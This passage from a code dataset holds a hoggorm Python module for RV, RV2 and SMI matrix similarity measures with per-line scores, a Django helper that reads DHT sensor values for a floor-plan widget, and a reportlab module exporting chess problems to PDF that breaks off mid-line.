[ "# -*- coding: utf-8 -*-\n", "\n", "import numpy\n", "import hoggorm.statTools as st\n", "\n", "\n", "def RVcoeff(dataList):\n", " \"\"\"\n", " This function computes the RV matrix correlation coefficients between pairs\n", " of arrays. The number and order of objects (rows) for the two arrays must\n", " match. The number of variables in each array may vary.\n", "\n", " Reference: `The STATIS method`_\n", "\n", " .. _The STATIS method: https://www.utdallas.edu/~herve/Abdi-Statis2007-pretty.pdf\n", "\n", " PARAMETERS\n", " ----------\n", " dataList : list\n", " A list holding numpy arrays for which the RV coefficient will be computed.\n", "\n", " RETURNS\n", " -------\n", " numpy array\n", " A numpy array holding RV coefficients for pairs of numpy arrays. The\n", " diagonal in the result array holds ones, since RV is computed on\n", " identical arrays, i.e. first array in ``dataList`` against frist array\n", " in\n", "\n", " Examples\n", " --------\n", " >>> import hoggorm as ho\n", " >>> import numpy as np\n", " >>>\n", " >>> # Generate some random data. Note that number of rows must match across arrays\n", " >>> arr1 = np.random.rand(50, 100)\n", " >>> arr2 = np.random.rand(50, 20)\n", " >>> arr3 = np.random.rand(50, 500)\n", " >>>\n", " >>> # Center the data before computation of RV coefficients\n", " >>> arr1_cent = arr1 - np.mean(arr1, axis=0)\n", " >>> arr2_cent = arr2 - np.mean(arr2, axis=0)\n", " >>> arr3_cent = arr3 - np.mean(arr3, axis=0)\n", " >>>\n", " >>> # Compute RV matrix correlation coefficients on mean centered data\n", " >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent])\n", " >>> array([[ 1. , 0.41751839, 0.77769025],\n", " [ 0.41751839, 1. , 0.51194496],\n", " [ 0.77769025, 0.51194496, 1. 
]])\n", " >>>\n", " >>> # Get RV for arr1_cent and arr2_cent\n", " >>> rv_results[0, 1]\n", " 0.41751838661314689\n", " >>>\n", " >>> # or\n", " >>> rv_results[1, 0]\n", " 0.41751838661314689\n", " >>>\n", " >>> # Get RV for arr2_cent and arr3_cent\n", " >>> rv_results[1, 2]\n", " 0.51194496245209853\n", " >>>\n", " >>> # or\n", " >>> rv_results[2, 1]\n", " 0.51194496245209853\n", "\n", " \"\"\"\n", "\n", " # First compute the scalar product matrices for each data set X\n", " scalArrList = []\n", "\n", " for arr in dataList:\n", " scalArr = numpy.dot(arr, numpy.transpose(arr))\n", " scalArrList.append(scalArr)\n", "\n", " # Now compute the 'between study cosine matrix' C\n", " C = numpy.zeros((len(dataList), len(dataList)), float)\n", "\n", " for index, element in numpy.ndenumerate(C):\n", " nom = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[1]]))\n", " denom1 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[0]]))\n", " denom2 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[1]]),\n", " scalArrList[index[1]]))\n", " Rv = nom / numpy.sqrt(numpy.dot(denom1, denom2))\n", " C[index[0], index[1]] = Rv\n", "\n", " return C\n", "\n", "\n", "def RV2coeff(dataList):\n", " \"\"\"\n", " This function computes the RV matrix correlation coefficients between pairs\n", " of arrays. The number and order of objects (rows) for the two arrays must\n", " match. The number of variables in each array may vary. The RV2 coefficient\n", " is a modified version of the RV coefficient with values -1 <= RV2 <= 1.\n", " RV2 is independent of object and variable size.\n", "\n", " Reference: `Matrix correlations for high-dimensional data - the modified RV-coefficient`_\n", "\n", " .. 
_Matrix correlations for high-dimensional data - the modified RV-coefficient: https://academic.oup.com/bioinformatics/article/25/3/401/244239\n", "\n", " PARAMETERS\n", " ----------\n", " dataList : list\n", " A list holding an arbitrary number of numpy arrays for which the RV\n", " coefficient will be computed.\n", "\n", " RETURNS\n", " -------\n", " numpy array\n", " A list holding an arbitrary number of numpy arrays for which the RV\n", " coefficient will be computed.\n", "\n", " Examples\n", " --------\n", " >>> import hoggorm as ho\n", " >>> import numpy as np\n", " >>>\n", " >>> # Generate some random data. Note that number of rows must match across arrays\n", " >>> arr1 = np.random.rand(50, 100)\n", " >>> arr2 = np.random.rand(50, 20)\n", " >>> arr3 = np.random.rand(50, 500)\n", " >>>\n", " >>> # Center the data before computation of RV coefficients\n", " >>> arr1_cent = arr1 - np.mean(arr1, axis=0)\n", " >>> arr2_cent = arr2 - np.mean(arr2, axis=0)\n", " >>> arr3_cent = arr3 - np.mean(arr3, axis=0)\n", " >>>\n", " >>> # Compute RV matrix correlation coefficients on mean centered data\n", " >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent])\n", " >>> array([[ 1. , -0.00563174, 0.04028299],\n", " [-0.00563174, 1. , 0.08733739],\n", " [ 0.04028299, 0.08733739, 1. 
]])\n", " >>>\n", " >>> # Get RV for arr1_cent and arr2_cent\n", " >>> rv_results[0, 1]\n", " -0.00563174\n", " >>>\n", " >>> # or\n", " >>> rv_results[1, 0]\n", " -0.00563174\n", " >>>\n", " >>> # Get RV for arr2_cent and arr3_cent\n", " >>> rv_results[1, 2]\n", " 0.08733739\n", " >>>\n", " >>> # or\n", " >>> rv_results[2, 1]\n", " 0.08733739\n", " \"\"\"\n", "\n", " # First compute the scalar product matrices for each data set X\n", " scalArrList = []\n", "\n", " for arr in dataList:\n", " scalArr = numpy.dot(arr, numpy.transpose(arr))\n", " diego = numpy.diag(numpy.diag(scalArr))\n", " scalArrMod = scalArr - diego\n", " scalArrList.append(scalArrMod)\n", "\n", " # Now compute the 'between study cosine matrix' C\n", " C = numpy.zeros((len(dataList), len(dataList)), float)\n", "\n", " for index, element in numpy.ndenumerate(C):\n", " nom = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[1]]))\n", " denom1 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[0]]))\n", " denom2 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[1]]),\n", " scalArrList[index[1]]))\n", " Rv = nom / numpy.sqrt(denom1 * denom2)\n", " C[index[0], index[1]] = Rv\n", "\n", " return C\n", "\n", "\n", "class SMI:\n", " \"\"\"\n", " Similarity of Matrices Index (SMI)\n", "\n", " A similarity index for comparing coupled data matrices.\n", " A two-step process starts with extraction of stable subspaces using\n", " Principal Component Analysis or some other method yielding two orthonormal bases. These bases\n", " are compared using Orthogonal Projection (OP / ordinary least squares) or Procrustes\n", " Rotation (PR). 
The result is a similarity measure that can be adjusted to various\n", " data sets and contexts and which includes explorative plotting and permutation based testing\n", " of matrix subspace equality.\n", "\n", " Reference: `A similarity index for comparing coupled matrices`_\n", "\n", " .. _A similarity index for comparing coupled matrices: https://onlinelibrary.wiley.com/doi/abs/10.1002/cem.3049\n", "\n", " PARAMETERS\n", " ----------\n", " X1 : numpy array\n", " first matrix to be compared.\n", " X2 : numpy array\n", " second matrix to be compared.\n", " ncomp1 : int, optional\n", " maximum number of subspace components from the first matrix.\n", " ncomp2 : int, optional\n", " maximum number of subspace components from the second matrix.\n", " projection : list, optional\n", " type of projection to apply, defaults to \"Orthogonal\", alternatively \"Procrustes\".\n", " Scores1 : numpy array, optional\n", " user supplied score-matrix to replace singular value decomposition of first matrix.\n", " Scores2 : numpy array, optional\n", " user supplied score-matrix to replace singular value decomposition of second matrix.\n", "\n", " RETURNS\n", " -------\n", " An SMI object containing all combinations of components.\n", "\n", " EXAMPLES\n", " --------\n", " >>> import numpy as np\n", " >>> import hoggorm as ho\n", "\n", " >>> X1 = ho.center(np.random.rand(100, 300))\n", " >>> U, s, V = np.linalg.svd(X1, 0)\n", " >>> X2 = np.dot(np.dot(np.delete(U, 2, 1), np.diag(np.delete(s, 2))), np.delete(V, 2, 0))\n", "\n", " >>> smiOP = ho.SMI(X1, X2, ncomp1=10, ncomp2=10)\n", " >>> smiPR = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, projection=\"Procrustes\")\n", " >>> smiCustom = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, Scores1=U)\n", "\n", " >>> print(smiOP.smi)\n", " >>> print(smiOP.significance())\n", " >>> print(smiPR.significance(B=100))\n", " \"\"\"\n", " def __init__(self, X1, X2, **kargs):\n", " # Check dimensions\n", " assert numpy.shape(X1)[0] == numpy.shape(X2)[0], 
ValueError(\n", " \"Number of objects must be equal in X1 and X2\")\n", "\n", " # Check number of components against rank\n", " rank1 = st.matrixRank(X1)\n", " rank2 = st.matrixRank(X2)\n", " if \"ncomp1\" not in kargs.keys():\n", " self.ncomp1 = rank1\n", " else:\n", " self.ncomp1 = kargs[\"ncomp1\"]\n", "\n", " if \"ncomp2\" not in kargs.keys():\n", " self.ncomp2 = rank2\n", " else:\n", " self.ncomp2 = kargs[\"ncomp2\"]\n", " assert self.ncomp1 <= rank1, ValueError(\n", " \"Number of components for X1 cannot be higher than the rank of X1\")\n", " assert self.ncomp2 <= rank2, ValueError(\n", " \"Number of components for X2 cannot be higher than the rank of X2\")\n", "\n", " # Handle projection types\n", " if \"projection\" not in kargs.keys():\n", " self.projection = \"Orthogonal\"\n", " else:\n", " self.projection = kargs[\"projection\"]\n", "\n", " assert self.projection in [\n", " \"Orthogonal\", \"Procrustes\"\n", " ], ValueError(\"Unknown projection, should be Orthogonal or Procrustes\")\n", "\n", " # Calculate scores if needed\n", " if \"Scores1\" not in kargs.keys():\n", " Scores1, s, V = numpy.linalg.svd(X1 - numpy.mean(X1, axis=0), 0)\n", " else:\n", " Scores1 = kargs[\"Scores1\"]\n", " if \"Scores2\" not in kargs.keys():\n", " Scores2, s, V = numpy.linalg.svd(X2 - numpy.mean(X2, axis=0), 0)\n", " else:\n", " Scores2 = kargs[\"Scores2\"]\n", "\n", " # Compute SMI values\n", " if self.projection == \"Orthogonal\":\n", " self.smi = numpy.cumsum(\n", " numpy.cumsum(\n", " numpy.square(\n", " numpy.dot(\n", " numpy.transpose(Scores1[:, :self.ncomp1]),\n", " Scores2[:, :self.ncomp2],\n", " )),\n", " axis=1,\n", " ),\n", " axis=0,\n", " ) / (numpy.reshape(\n", " numpy.min(\n", " numpy.vstack([\n", " numpy.tile(range(self.ncomp1), self.ncomp1),\n", " numpy.repeat(range(self.ncomp2), self.ncomp2),\n", " ]),\n", " 0,\n", " ),\n", " [self.ncomp1, self.ncomp2],\n", " ) + 1)\n", " else:\n", " # Procrustes\n", " self.smi = numpy.zeros([self.ncomp1, self.ncomp2])\n", " 
TU = numpy.dot(\n", " numpy.transpose(Scores1[:, 0:self.ncomp1]),\n", " Scores2[:, 0:self.ncomp2],\n", " )\n", " for p in range(self.ncomp1):\n", " for q in range(self.ncomp2):\n", " U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1])\n", " self.smi[p, q] = numpy.square(numpy.mean(s))\n", "\n", " # Recover wrong calculations (due to numerics)\n", " self.smi[self.smi > 1] = 1\n", " self.smi[self.smi < 0] = 0\n", "\n", " self.N = numpy.shape(Scores1)[0]\n", " self.Scores1 = Scores1\n", " self.Scores2 = Scores2\n", "\n", " def significance(self, **kargs):\n", " \"\"\"\n", " Significance estimation for Similarity of Matrices Index (SMI)\n", "\n", " For each combination of components significance is estimated by sampling from a null distribution\n", " of no similarity, i.e. when the rows of one matrix is permuted B times and corresponding SMI values are\n", " computed. If the vector replicates is included, replicates will be kept together through\n", " permutations.\n", "\n", " PARAMETERS\n", " ----------\n", " B integer : int, optional\n", " number of permutations, default = 10000.\n", " replicates : numpy array\n", " integer vector of replicates (must be balanced).\n", "\n", " RETURNS\n", " -------\n", " An array containing P-values for all combinations of components.\n", " \"\"\"\n", " if \"B\" not in kargs.keys():\n", " B = 10000\n", " else:\n", " B = kargs[\"B\"]\n", " P = numpy.zeros([self.ncomp1, self.ncomp2])\n", "\n", " if self.projection == \"Orthogonal\":\n", " m = (numpy.reshape(\n", " numpy.min(\n", " numpy.vstack([\n", " numpy.tile(range(self.ncomp1), self.ncomp1),\n", " numpy.repeat(range(self.ncomp2), self.ncomp2),\n", " ]),\n", " 0,\n", " ),\n", " [self.ncomp1, self.ncomp2],\n", " ) + 1)\n", " if \"replicates\" not in kargs.keys():\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " while i < B:\n", " numpy.random.shuffle(BScores1)\n", " smiB = (numpy.cumsum(\n", " numpy.cumsum(\n", " numpy.square(\n", " numpy.dot(\n", " numpy.transpose(BScores1[:, 
:self.ncomp1]),\n", " self.Scores2[:, :self.ncomp2],\n", " )),\n", " axis=1,\n", " ),\n", " axis=0,\n", " ) / m)\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", " else:\n", " # With replicates\n", " AScores1 = self.Scores1.copy()\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " replicates = kargs[\"replicates\"]\n", " uni = numpy.unique(replicates, return_inverse=True)\n", " vecOut = numpy.array(range(numpy.shape(uni[0])[0]))\n", " vecIn = numpy.array(range(sum(uni[1] == 0)))\n", " nOut = len(vecOut)\n", " nIn = len(vecIn)\n", " while i < B:\n", " numpy.random.shuffle(\n", " vecOut) # Permute across replicate sets\n", " for j in range(nOut):\n", " numpy.random.shuffle(\n", " vecIn) # Permute inside replicate sets\n", " BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) +\n", " vecIn, :]\n", " smiB = (numpy.cumsum(\n", " numpy.cumsum(\n", " numpy.square(\n", " numpy.dot(\n", " numpy.transpose(BScores1[:, :self.ncomp1]),\n", " self.Scores2[:, :self.ncomp2],\n", " )),\n", " axis=1,\n", " ),\n", " axis=0,\n", " ) / m)\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", "\n", " else:\n", " if \"replicates\" not in kargs.keys():\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " smiB = numpy.zeros([self.ncomp1, self.ncomp2])\n", " while i < B:\n", " numpy.random.shuffle(BScores1) # Permutation of rows\n", " TU = numpy.dot(\n", " numpy.transpose(BScores1[:, 0:self.ncomp1]),\n", " self.Scores2[:, 0:self.ncomp2],\n", " )\n", " for p in range(self.ncomp1):\n", " for q in range(self.ncomp2):\n", " U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1])\n", " smiB[p, q] = numpy.square(numpy.mean(s))\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", " else:\n", " # With replicates\n", " AScores1 = self.Scores1.copy()\n", " BScores1 = 
self.Scores1.copy()\n", " i = 0\n", " smiB = numpy.zeros([self.ncomp1, self.ncomp2])\n", " replicates = kargs[\"replicates\"]\n", " uni = numpy.unique(replicates, return_inverse=True)\n", " vecOut = numpy.array(range(numpy.shape(uni[0])[0]))\n", " vecIn = numpy.array(range(sum(uni[1] == 0)))\n", " nOut = len(vecOut)\n", " nIn = len(vecIn)\n", " while i < B:\n", " numpy.random.shuffle(\n", " vecOut) # Permute across replicate sets\n", " for j in range(nOut):\n", " numpy.random.shuffle(\n", " vecIn) # Permute inside replicate sets\n", " BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) +\n", " vecIn, :]\n", " TU = numpy.dot(\n", " numpy.transpose(BScores1[:, 0:self.ncomp1]),\n", " self.Scores2[:, 0:self.ncomp2],\n", " )\n", " for p in range(self.ncomp1):\n", " for q in range(self.ncomp2):\n", " U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1])\n", " smiB[p, q] = numpy.square(numpy.mean(s))\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", "\n", " return P / B\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0.006711409395973154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01020408163265306, 0.011235955056179775, 0.011627906976744186, 0.010309278350515464, 0, 0, 0, 0, 0.008620689655172414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0.010869565217391304, 0, 0.010752688172043012, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009433962264150943, 0.008928571428571428, 0.010309278350515464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
463
0.000406
false
# coding=utf-8 from plugins.utils import get_used_plugins_by, get_latest_sensor_value from climate.models import TempHumidValue def get_widget_data(plan_id): """ Функция, предоставляющая данные температуры и относительной влажности для каждого добавленого датчика DHT. :param plan_id: int ID планировки. :returns: list Список кортежей с данными температуры, влажности и координатами расположения виджета. """ sensors = get_used_plugins_by(package='plugins.arduino_dht') sensors = [sensor for sensor in sensors if sensor.plan_image_id == plan_id] values = [get_latest_sensor_value(TempHumidValue, sensor) for sensor in sensors] return [(plan_id, v.content_object.name, v.content_object.horiz_position, v.content_object.vert_position, v.content_object.level, v.temperature, v.humidity) for v in values if v is not None]
[ "# coding=utf-8\n", "from plugins.utils import get_used_plugins_by, get_latest_sensor_value\n", "from climate.models import TempHumidValue\n", "\n", "\n", "def get_widget_data(plan_id):\n", " \"\"\"\n", " Функция, предоставляющая данные температуры и относительной влажности для каждого\n", " добавленого датчика DHT.\n", "\n", " :param plan_id: int ID планировки.\n", " :returns: list Список кортежей с данными температуры, влажности и координатами расположения\n", " виджета.\n", " \"\"\"\n", "\n", " sensors = get_used_plugins_by(package='plugins.arduino_dht')\n", " sensors = [sensor for sensor in sensors if sensor.plan_image_id == plan_id]\n", "\n", " values = [get_latest_sensor_value(TempHumidValue, sensor) for sensor in sensors]\n", "\n", " return [(plan_id, v.content_object.name, v.content_object.horiz_position,\n", " v.content_object.vert_position, v.content_object.level,\n", " v.temperature, v.humidity) for v in values if v is not None]\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0 ]
23
0.00147
false
# -*- coding: utf-8 -*- # local import model # 3rd party import reportlab.rl_config reportlab.rl_config.warnOnMissingFontGlyphs = 0 from reportlab.pdfbase import pdfmetrics from reportlab.pdfbase.ttfonts import TTFont import reportlab.platypus from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle from reportlab.lib.pagesizes import A4 from PyQt5 import QtGui # local import model FONT_FAMILY = 'Roboto Condensed' FONT_SIZE = { 'header': 12, 'chess': 18, 'subscript': 10, 'footer': 10, 'rightpane': 12} FONT_DIR = 'resources/fonts/roboto/' FONT_INFO = { 'normal': ( FONT_FAMILY + '', 'RobotoCondensed-Regular.ttf'), 'bold': ( FONT_FAMILY + ' Bold', 'RobotoCondensed-Bold.ttf'), 'italic': ( FONT_FAMILY + ' Italic', 'RobotoCondensed-Italic.ttf'), 'boldItalic': ( FONT_FAMILY + ' Bold Italic', 'RobotoCondensed-BoldItalic.ttf')} CHESS_FONTS = { 'd': ('GC2004D', 'resources/fonts/gc2004d_.ttf'), 'x': ('GC2004X', 'resources/fonts/gc2004x_.ttf'), 'y': ('GC2004Y', 'resources/fonts/gc2004y_.ttf') } CHESS_FONT_RENDERING_OFFSET = 0.25 MARGIN_X, MARGIN_Y = 72 - FONT_SIZE['chess'], 72 AUX_X_MARGIN = 36 CHESS_FONT_STYLES = {} def register_fonts(): for variation in list(FONT_INFO.keys()): pdfmetrics.registerFont(TTFont(FONT_INFO[variation][0], FONT_DIR+FONT_INFO[variation][1])) pdfmetrics.registerFontFamily( FONT_FAMILY, normal=FONT_INFO['normal'][0], bold=FONT_INFO['bold'][0], italic=FONT_INFO['italic'][0], boldItalic=FONT_INFO['boldItalic'][0]) for key in list(CHESS_FONTS.keys()): pdfmetrics.registerFont(TTFont(CHESS_FONTS[key][0], CHESS_FONTS[key][1])) pdfmetrics.registerFontFamily(key, normal=key, bold=key, italic=key, boldItalic=key) styles = getSampleStyleSheet() styles.add( ParagraphStyle( name='chess'+key, wordWrap=False, fontName=CHESS_FONTS[key][0], fontSize=FONT_SIZE['chess'], spaceAfter=0)) CHESS_FONT_STYLES[key] = styles['chess'+key] def getPieceParagraph(font, char): return reportlab.platypus.Paragraph( '<para autoLeading="max">%s</para>' % char, 
CHESS_FONT_STYLES[font] ) class ExportDocument: def __init__(self, records, Lang): ExportDocument.startFonts() self.records, self.Lang = records, Lang register_fonts() styles = getSampleStyleSheet() styles.add(ParagraphStyle(name='Justify', wordWrap=True)) styles.add(ParagraphStyle(name='Center', alignment=reportlab.lib.enums.TA_CENTER)) styles.add( ParagraphStyle( name='Pre', wordWrap=True, fontName=FONT_FAMILY, fontSize=FONT_SIZE['rightpane'], spaceAfter=FONT_SIZE['rightpane'])) self.style = styles['Justify'] self.style_pre = styles['Pre'] self.style_center = styles['Center'] def doExport(self, filename): frameTemplate = reportlab.platypus.Frame( 0, 0, A4[0], A4[1], leftPadding=MARGIN_X, bottomPadding=MARGIN_Y, rightPadding=MARGIN_X, topPadding=MARGIN_Y ) pageTemplate = reportlab.platypus.PageTemplate(frames=[frameTemplate]) docTemplate = reportlab.platypus.BaseDocTemplate( filename, pagesize=A4, pageTemplates=[pageTemplate], showBoundary=1, leftMargin=0, rightMargin=0, topMargin=0, bottomMargin=0, allowSplitting=1, _pageBreakQuick=1) story = [] for i in range(0, len(self.records)): story.append(self.mainTable(self.records[i])) story.append(reportlab.platypus.PageBreak()) docTemplate.build(story) def subscript(self, left, middle, right): fs = FONT_SIZE['chess'] t = reportlab.platypus.Table([['', left, middle, right]], colWidths=[fs*(1+CHESS_FONT_RENDERING_OFFSET), 2 * fs, 4 * fs, 2 * fs], rowHeights=[None] ) t.setStyle(reportlab.platypus.TableStyle([ ('LEFTPADDING', (1, 0), (1, 0), 0), ('RIGHTPADDING', (3, 0), (3, 0), 0), ('TOPPADDING', (0, 0), (-1, 0), FONT_SIZE['subscript']), ('VALIGN', (0, 0), (-1, 0), 'TOP'), ('ALIGN', (1, 0), (1, 0), 'LEFT'), ('ALIGN', (2, 0), (2, 0), 'CENTER'), ('ALIGN', (3, 0), (3, 0), 'RIGHT'), ('FACE', (0, 0), (-1, 0), FONT_FAMILY), ('SIZE', (0, 0), (-1, 0), FONT_SIZE['subscript']) ])) return t def mainTable(self, entry): w_left = 10 * FONT_SIZE['chess'] w_right = A4[0] - 2 * MARGIN_X - w_left - AUX_X_MARGIN t = reportlab.platypus.Table( 
[[self.leftTop(entry), '', ''], [self.leftBottom(entry), '', self.rightBottom(entry)]], colWidths=[w_left, AUX_X_MARGIN, w_right], rowHeights=[None, None] ) t.setStyle(reportlab.platypus.TableStyle([ ('VALIGN', (0, 0), (-1, 0), 'BOTTOM'), ('VALIGN', (0, 1), (-1, 1), 'TOP') ])) return t def leftTop(self, e): if e is None: return '' header = reportlab.platypus.Paragraph( '<font face="%s" size=%d>%s</font><br/>' % (FONT_FAMILY, FONT_SIZE['header'], ExportDocument.header(e, self.Lang)), self.style ) return reportlab.platypus.Table( [['', header]], colWidths=[FONT_SIZE['chess'], 9*FONT_SIZE['chess']] ) def leftBottom(self, e): story = [] if e is None: return story b = model.Board() if 'algebraic' in e: b.fromAlgebraic(e['algebraic']) story.append(self.getBoardTable(b)) s_left = '' if 'stipulation' in e: s_left = e['stipulation'] s_middle = reportlab.platypus.Paragraph( '<font face="%s" size=%d>%s</font>' % (FONT_FAMILY, FONT_SIZE['footer'], ExportDocument.solver( e, self.Lang) + '<br/>' + ExportDocument.legend(b)), self.style_center) story.append(self.subscript(s_left, s_middle, b.getPiecesCount())) return story def fenLine(self, b): t = reportlab.platypus.Table([[b.toFen()]]) t.setStyle(reportlab.platypus.TableStyle([ ('TEXTCOLOR', (0, 0), (-1, -1), (0.75, 0.75, 0.75)), ('LEFTPADDING', (0, 0), (-1, -1), 0), ('TOPPADDING', (0, 0), (-1, -1), FONT_SIZE['rightpane']), ])) return t def rightBottom(self, e): story = [] if e is None: return story parts = [] if 'solution' in e: story.append( reportlab.platypus.Preformatted( wrapParagraph( e['solution'], 50), self.style_pre)) if 'keywords' in e: parts.append('<i>' + ', '.join(e['keywords']) + '</i>') if 'comments' in e: parts.append('<br/>'.join(e['comments'])) story.append(reportlab.platypus.Paragraph( '<font face="%s" size=%d>%s</font>' % ( FONT_FAMILY, FONT_SIZE['rightpane'], '<br/><br/>'.join(parts) ), self.style )) if 'algebraic' in e: b = model.Board() b.fromAlgebraic(e['algebraic']) story.append(self.fenLine(b)) return 
story def header(e, Lang): parts = [] if'authors' in e: parts.append("<b>" + "<br/>".join(e['authors']) + "</b>") if 'source' in e and 'name' in e['source']: s = "<i>" + e['source']['name'] + "</i>" sourceid = model.formatIssueAndProblemId(e['source']) if sourceid != '': s = s + "<i> (" + sourceid + ")</i>" if 'date' in e['source']: s = s + "<i>, " + model.formatDate(e['source']['date']) + "</i>" parts.append(s) if 'award' in e: tourney = e.get('award', {}).get('tourney', {}).get('name', '') source = e.get('source', {}).get('name', '') if tourney != '' and tourney != source: parts.append(tourney) if 'distinction' in e['award']: d = model.Distinction.fromString(e['award']['distinction']) parts.append(d.toStringInLang(Lang)) return ExportDocument.escapeHtml("<br/>".join(parts)) header = staticmethod(header) def solver(e, Lang): parts = [] if(model.notEmpty(e, 'intended-solutions')): if '.' in e['intended-solutions']: parts.append(e['intended-solutions']) else: parts.append( e['intended-solutions'] + " " + Lang.value('EP_Intended_solutions_shortened')) if('options' in e): parts.append("<b>" + "<br/>".join(e['options']) + "</b>") if('twins' in e): parts.append(model.createPrettyTwinsText(e)) return ExportDocument.escapeHtml("<br/>".join(parts)) solver = staticmethod(solver) def legend(board): legend = board.getLegend() if len(legend) == 0: return '' return ExportDocument.escapeHtml( "<br/>".join([", ".join(legend[k]) + ': ' + k for k in list(legend.keys())])) legend = staticmethod(legend) def escapeHtml(str): str = str.replace('&', '&amp;') # todo: more replacements return str escapeHtml = staticmethod(escapeHtml) fontsStarted = False def startFonts(): if ExportDocument.fontsStarted: return register_fonts() ExportDocument.topBorder = [getPieceParagraph('y', char) for char in "KLLLLLLLLM"] ExportDocument.bottomBorder = [getPieceParagraph('y', char) for char in "RSSSSSSSST"] ExportDocument.leftBorder = getPieceParagraph('y', "N") ExportDocument.rightBorder = 
getPieceParagraph('y', "Q") ExportDocument.fontsStarted = True startFonts = staticmethod(startFonts) def board2Table(self, board): rows, row = [ExportDocument.topBorder], None for i in range(64): if i % 8 == 0: row = [ExportDocument.leftBorder] rows.append(row) font, char = 'd', ["\xA3", "\xA4"][((i >> 3) + (i % 8)) % 2] if not board.board[i] is None: glyph = board.board[i].toFen() if len(glyph) > 1: glyph = glyph[1:-1] font = model.FairyHelper.fontinfo[glyph]['family'] char = model.FairyHelper.to_html(glyph, i, board.board[i].specs) row.append(getPieceParagraph(font, char)) if i % 8 == 7: row.append(ExportDocument.rightBorder) rows.append(ExportDocument.bottomBorder) return rows def board2Html(self, board): lines = [] spans, fonts, prevfont = [], [], 'z' for i in range(64): font, char = 'd', ["\xA3", "\xA4"][((i >> 3) + (i % 8)) % 2] if not board.board[i] is None: glyph = board.board[i].toFen() if len(glyph) > 1: glyph = glyph[1:-1] font = model.FairyHelper.fontinfo[glyph]['family'] char = model.FairyHelper.fontinfo[glyph][ 'chars'][((i >> 3) + (i % 8)) % 2] if font != prevfont: fonts.append(font) spans.append([char]) prevfont = font else: spans[-1].append(char) if i != 63 and i % 8 == 7: spans[-1].append("<br/>") return ''.join( [ '<font face="%s" 